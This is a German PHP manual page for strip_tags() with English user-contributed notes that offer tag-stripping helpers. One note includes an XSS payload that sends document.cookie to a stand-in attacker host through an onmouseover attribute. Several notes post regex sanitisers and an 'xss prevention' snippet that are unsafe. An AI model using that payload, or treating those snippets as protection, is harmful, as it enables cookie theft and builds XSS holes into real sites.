strip_tags

(PHP 4, PHP 5)

strip_tagsEntfernt HTML- und PHP-Tags aus einem String

Beschreibung

string strip_tags ( string $str [, string $allowable_tags ] )

Diese Funktion versucht, einen String zurückzugeben, der die um alle NUL Bytes, HTML- und PHP-Tags reduzierte Version von str darstellt. Sie verwendet die gleiche Engine zum Entfernen der Tags wie fgetss().

Parameter-Liste

str

Die Eingabezeichenkette.

allowable_tags

Sie können den optionalen zweiten Parameter verwenden, um die Tags anzugeben, die nicht entfernt werden sollen.

Hinweis:

HTML-Kommentare und PHP-Tags werden ebenfalls entfernt. Dieses Verhalten ist hartkodiert und kann nicht mittels allowable_tags verändert werden.

Hinweis:

Dieser Parameter sollte keine Leerzeichen enthalten. strip_tags() sieht als Tag eine von Groß- und Kleinschreibung unabhängige Zeichenkette zwischen< und dem ersten Leerzeichen oder >. Dies bedeutet, dass strip_tags("<br/>", "<br>") eine leere Zeichenkette zurückgibt.

Rückgabewerte

Gibt die reduzierte Zeichenkette zurück.

Changelog

Version Beschreibung
5.0.0 Die Funktion strip_tags() ist jetzt Binary safe.
4.3.0 HTML-Kommentare werden ab jetzt immer entfernt.

Beispiele

Beispiel #1 strip_tags()-Beispiel

<?php
$text 
'<p>Test-Absatz.</p><!-- Kommentar --> <a href="#fragment">Anderer Text</a>';
echo 
strip_tags($text);
echo 
"\n";

// <p> und <a> zulassen
echo strip_tags($text'<p><a>');
?>

Das oben gezeigte Beispiel erzeugt folgende Ausgabe:

Test-Absatz. Anderer Text
<p>Test-Absatz.</p> <a href="#fragment">Anderer Text</a>

Anmerkungen

Warnung

Da strip_tags() HTML nicht wirklich validiert, kann es passieren, dass bei unvollständigen oder unkorrekten Tags mehr Text/Daten gelöscht werden als erwartet.

Warnung

Diese Funktion modifiziert keine Attribute bei Tags, die via allowable_tags erlaubt wurden, dies betrifft auch style und onmouseover Attribute, die ein böswilliger User verwenden kann, um einen Text zu posten, der von anderen Usern gesehen werden soll.

Siehe auch

add a note add a note

User Contributed Notes 17 notes

up
32
Kenji
7 months ago
A word of warning!!
Do NOT use "admin at automapit dot com"s regex. It's broken:

"lalala <b<b>> lala </b<b>>"

will be stripped into

"lalala <b> lala </b>"

I CANNOT overstate the severity of the security issues you are introducing with such a code! Don't use it, stay safe.
up
28
CEO at CarPool2Camp dot org
5 years ago
Note the different outputs from different versions of the same tag:

<?php // striptags.php
$data = '<br>Each<br/>New<br />Line';
$new  = strip_tags($data, '<br>');
var_dump($new);  // OUTPUTS string(21) "<br>EachNew<br />Line"

<?php // striptags.php
$data = '<br>Each<br/>New<br />Line';
$new  = strip_tags($data, '<br/>');
var_dump($new); // OUTPUTS string(16) "Each<br/>NewLine"

<?php // striptags.php
$data = '<br>Each<br/>New<br />Line';
$new  = strip_tags($data, '<br />');
var_dump($new); // OUTPUTS string(11) "EachNewLine"
?>
up
15
mariusz.tarnaski at wp dot pl
6 years ago
Hi. I made a function that removes the HTML tags along with their contents:

Function:
<?php
function strip_tags_content($text, $tags = '', $invert = FALSE) {

 
preg_match_all('/<(.+?)[\s]*\/?[\s]*>/si', trim($tags), $tags);
 
$tags = array_unique($tags[1]);
   
  if(
is_array($tags) AND count($tags) > 0) {
    if(
$invert == FALSE) {
      return
preg_replace('@<(?!(?:'. implode('|', $tags) .')\b)(\w+)\b.*?>.*?</\1>@si', '', $text);
    }
    else {
      return
preg_replace('@<('. implode('|', $tags) .')\b.*?>.*?</\1>@si', '', $text);
    }
  }
  elseif(
$invert == FALSE) {
    return
preg_replace('@<(\w+)\b.*?>.*?</\1>@si', '', $text);
  }
  return
$text;
}
?>

Sample text:
$text = '<b>sample</b> text with <div>tags</div>';

Result for strip_tags($text):
sample text with tags

Result for strip_tags_content($text):
text with

Result for strip_tags_content($text, '<b>'):
<b>sample</b> text with

Result for strip_tags_content($text, '<b>', TRUE);
text with <div>tags</div>

I hope that someone is useful :)
up
11
bzplan at web dot de
2 years ago
a HTML code like this:

<?php
$html
= '
<div>
<p style="color:blue;">color is blue</p><p>size is <span style="font-size:200%;">huge</span></p>
<p>material is wood</p>
</div>
'
;
?>

with <?php $str = strip_tags($html); ?>
... the result is:

$str = 'color is bluesize is huge
material is wood';

notice: the words 'blue' and 'size' grow together :(
and line-breaks are still in new string $str

if you need a space between the words (and without line-break)
use my function: <?php $str = rip_tags($html); ?>
... the result is:

$str = 'color is blue size is huge material is wood';

the function:

<?php
// --------------------------------------------------------------

function rip_tags($string) {
   
   
// ----- remove HTML TAGs -----
   
$string = preg_replace ('/<[^>]*>/', ' ', $string);
   
   
// ----- remove control characters -----
   
$string = str_replace("\r", '', $string);    // --- replace with empty space
   
$string = str_replace("\n", ' ', $string);   // --- replace with space
   
$string = str_replace("\t", ' ', $string);   // --- replace with space
   
    // ----- remove multiple spaces -----
   
$string = trim(preg_replace('/ {2,}/', ' ', $string));
   
    return
$string;

}

// --------------------------------------------------------------
?>

the KEY is the regex pattern: '/<[^>]*>/'
instead of strip_tags()
... then remove control characters and multiple spaces
:)
up
2
obeyer at popsugar dot com
10 months ago
actually, for PHP 5.4.19, if you want to add line breaks <br> to allowable tags, you should use "<br>". Both <br/> and <br /> in allowable tags won't do anything, and line breaks will be stripped
up
1
bnt dot gloria at outlook dot com
4 months ago
With allowable_tags, strip-tags is not safe.

<?php

$str
= "<p onmouseover=\"window.location='http://www.theBad.com/?cookie='+document.cookie;\"> don't mouseover </p>";
$str= strip_tags($str, '<p>');
echo
$str; // DISPLAY: <p onmouseover=\"window.location='http://www.theBad.com/?cookie='+document.cookie;\"> don't mouseover </p>";

?>
up
2
mshaffer
1 year ago
Below was a note on "strip_tags" page that got removed off of PHP.net ... I found this note useful, and use the code in parsing before "stripping tags" ... I don't know why in the world you would delete this one, but keep others ... your review system is a bit disturbing ...

On your page you have a warning about how data may be lost, but you delete a user-contributed comment that helps prevent that?

======================

aleksey at favor dot com dot ua 24-Feb-2011 01:06

strip_tags destroys the whole HTML behind the tags with invalid attributes. Like <img src="/images/image.jpg""> (look, there is an odd quote before >.)

So I wrote function which fixes unsafe attributes and replaces odd " and ' quotes with &quot; and &#39;.

<?php
function fix_unsafe_attributes($s) {
 
$out = false;
  while (
preg_match('/<([A-Za-z])[^>]*?>/', $s, $i, PREG_OFFSET_CAPTURE)) { // find where the tag begins
   
$i = $i[1][1]+1;
   
$out.= substr($s, 0, $i);
   
$s = substr($s, $i);

   
// scan attributes and find odd " and '
   
while (((($i1 = strpos($s, '"')) || 1) && (($i2 = strpos($s, '\'')) || 1)) && ($i1 !== false || $i2 !== false) &&
           ((
$i = (int)(($i1 !== false) && ($i2 !== false) ? ($i1 < $i2 ? $i1 : $i2) : ($i1 == false ? $i2 : $i1))) !== false) &&
           (((
$c = strpos($s, '>')) === false) || ($i < $c))) {

     
$c = $s{$i};
      if ((
$i < 1) || ($s{$i-1} != '=')) {
       
$out.= substr($s, 0, $i).($s{$i} == '"' ? '&quot;' : '&#39;'); // replace odd " and '
       
$s = substr($s, $i+1);
      }else {
       
$i++;
       
$out.= substr($s, 0, $i);
       
$s = substr($s, $i);

        if ((
$i = strpos($s, $c)) !== false) {
         
$i++;
         
$out.= substr($s, 0, $i);
         
$s = substr($s, $i);
        }
      }
    }
  }
  return
$out.$s;
}
?>

Maybe this function can be rewritten with simple regular expression but I have no luck to make it quickly.
up
3
tom at cowin dot us
4 years ago
With most web based user input of more than a line of text, it seems I get 90% 'paste from Word'. I've developed this fn over time to try to strip all of this cruft out. A few things I do here are application specific, but if it helps you - great, if you can improve on it or have a better way - please - post it...

<?php

   
function strip_word_html($text, $allowed_tags = '<b><i><sup><sub><em><strong><u><br>')
    {
       
mb_regex_encoding('UTF-8');
       
//replace MS special characters first
       
$search = array('/&lsquo;/u', '/&rsquo;/u', '/&ldquo;/u', '/&rdquo;/u', '/&mdash;/u');
       
$replace = array('\'', '\'', '"', '"', '-');
       
$text = preg_replace($search, $replace, $text);
       
//make sure _all_ html entities are converted to the plain ascii equivalents - it appears
        //in some MS headers, some html entities are encoded and some aren't
       
$text = html_entity_decode($text, ENT_QUOTES, 'UTF-8');
       
//try to strip out any C style comments first, since these, embedded in html comments, seem to
        //prevent strip_tags from removing html comments (MS Word introduced combination)
       
if(mb_stripos($text, '/*') !== FALSE){
           
$text = mb_eregi_replace('#/\*.*?\*/#s', '', $text, 'm');
        }
       
//introduce a space into any arithmetic expressions that could be caught by strip_tags so that they won't be
        //'<1' becomes '< 1'(note: somewhat application specific)
       
$text = preg_replace(array('/<([0-9]+)/'), array('< $1'), $text);
       
$text = strip_tags($text, $allowed_tags);
       
//eliminate extraneous whitespace from start and end of line, or anywhere there are two or more spaces, convert it to one
       
$text = preg_replace(array('/^\s\s+/', '/\s\s+$/', '/\s\s+/u'), array('', '', ' '), $text);
       
//strip out inline css and simplify style tags
       
$search = array('#<(strong|b)[^>]*>(.*?)</(strong|b)>#isu', '#<(em|i)[^>]*>(.*?)</(em|i)>#isu', '#<u[^>]*>(.*?)</u>#isu');
       
$replace = array('<b>$2</b>', '<i>$2</i>', '<u>$1</u>');
       
$text = preg_replace($search, $replace, $text);
       
//on some of the ?newer MS Word exports, where you get conditionals of the form 'if gte mso 9', etc., it appears
        //that whatever is in one of the html comments prevents strip_tags from eradicating the html comment that contains
        //some MS Style Definitions - this last bit gets rid of any leftover comments */
       
$num_matches = preg_match_all("/\<!--/u", $text, $matches);
        if(
$num_matches){
             
$text = preg_replace('/\<!--(.)*--\>/isu', '', $text);
        }
        return
$text;
    }
?>
up
0
pietro777
5 months ago
$data = '<br>Each<br/>New<br />Line';
$new  = strip_tags($data, '<br />||<br/>||<br>');
var_dump($new); // OUTPUTS string(11) "<br>Each<br/>New<br />Line"
up
-1
kai at froghh dot de
5 years ago
a function that decides if < is a start of a tag or a lower than / lower than + equal:

<?php
function lt_replace($str){
    return
preg_replace("/<([^[:alpha:]])/", '&lt;\\1', $str);
}
?>

It's to be used before strip_slashes.
up
-3
admin at automapit dot com
8 years ago
<?php
function html2txt($document){
$search = array('@<script[^>]*?>.*?</script>@si'// Strip out javascript
              
'@<[\/\!]*?[^<>]*?>@si',            // Strip out HTML tags
              
'@<style[^>]*?>.*?</style>@siU',    // Strip style tags properly
              
'@<![\s\S]*?--[ \t\n\r]*>@'         // Strip multi-line comments including CDATA
);
$text = preg_replace($search, '', $document);
return
$text;
}
?>

This function turns HTML into text... strips tags, comments spanning multiple lines including CDATA, and anything else that gets in it's way.

It's a frankenstein function I made from bits picked up on my travels through the web, thanks to the many who have unwittingly contributed!
up
-2
cesar at nixar dot org
8 years ago
Here is a recursive function for strip_tags like the one showed in the stripslashes manual page.

<?php
function strip_tags_deep($value)
{
  return
is_array($value) ?
   
array_map('strip_tags_deep', $value) :
   
strip_tags($value);
}

// Example
$array = array('<b>Foo</b>', '<i>Bar</i>', array('<b>Foo</b>', '<i>Bar</i>'));
$array = strip_tags_deep($array);

// Output
print_r($array);
?>
up
-2
sERGE-01
11 months ago
Fix for my Example2.
If the text does not have allowed tags, $out_text is empty. Fix:

<?php
    $out_text
= "";
   
$ofs = 0;
    if(
preg_match_all('#</?('.$tags_allowed.')\b([^><]*>)#sim', $in_text, $matches, PREG_OFFSET_CAPTURE))
    {
        foreach(
$matches[0] as $tag)
        {
           
$out_text .= htmlentities(substr($in_text, $ofs, $tag[1] - $ofs), ENT_NOQUOTES, "cp1251");
           
$out_text .= $tag[0];
           
$ofs = $tag[1] + strlen($tag[0]);
        }
    }
   
$out_text .= htmlentities(substr($in_text, $ofs), ENT_NOQUOTES, "cp1251"); // end of text
?>
up
-3
salavert at~ akelos
8 years ago
<?php
      
/**
    * Works like PHP function strip_tags, but it only removes selected tags.
    * Example:
    *     strip_selected_tags('<b>Person:</b> <strong>Salavert</strong>', 'strong') => <b>Person:</b> Salavert
    */

   
function strip_selected_tags($text, $tags = array())
    {
       
$args = func_get_args();
       
$text = array_shift($args);
       
$tags = func_num_args() > 2 ? array_diff($args,array($text))  : (array)$tags;
        foreach (
$tags as $tag){
            if(
preg_match_all('/<'.$tag.'[^>]*>(.*)<\/'.$tag.'>/iU', $text, $found)){
               
$text = str_replace($found[0],$found[1],$text);
          }
        }

        return
$text;
    }

?>

Hope you find it useful,

Jose Salavert
up
-2
sERGE-01
11 months ago
My strip_tags:

1) Simple removal of all disallowed tags. Broken tags remain unchanged:
<?php
    $tags_allowed
= "a|b|i|s|u|br";
   
$in_text = "<b>Bold</b><table><tr><td>Table</td></tr></table><br><i>Italic>></i><div>Div</div>";
   
   
$out_text = preg_replace('#</?(?!('.$tags_allowed.'))\b([^><]*>)#sim', "", $in_text);
   
    print
"Example 1:<br>";
    print
htmlentities($out_text)."<br>";
?>
-------------------------------
Example 1:
<b>Bold</b>Table<br><i>Italic>></i>Div
-------------------------------

2) This example leaves all allowed tags and screen the rest of the text with  htmlentities() function:
<?php
   
// getting all of allowed tags with their offset
   
if(preg_match_all('#</?('.$tags_allowed.')\b([^><]*>)#sim', $in_text, $matches, PREG_OFFSET_CAPTURE))
    {
       
$out_text = "";
       
$ofs = 0;
        foreach(
$matches[0] as $tag)
        {
           
// text before allowed tag
           
$out_text .= htmlentities(substr($in_text,$ofs,$tag[1]-$ofs), ENT_NOQUOTES, "cp1251");
           
$out_text .= $tag[0]; // next allowed tag
           
$ofs = $tag[1] + strlen($tag[0]);
        }
       
// adding end of text
       
$out_text .= htmlentities(substr($in_text, $ofs), ENT_NOQUOTES, "cp1251");
    }

    print
"Example 2:<br>";
    print
htmlentities($out_text)."<br>";
?>
-------------------------------
Example 2:
<b>Bold</b>&lt;table&gt;&lt;tr&gt;&lt;td&gt;Table&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;<br>
<i>Italic&gt;&gt;</i>&lt;div&gt;Div&lt;/div&gt;
-------------------------------
up
-7
andy
8 months ago
<?php
//***    Universal prevent xss  ***
//   place this in top of script to prevent xss on your site
$_GET=array_map("strip_tags",$_GET);
$_POST=array_map("strip_tags",$_POST);
?>
up
-19
brettz9 AAT yah
5 years ago
Works on shortened <?...?> syntax and thus also will remove XML processing instructions.
To Top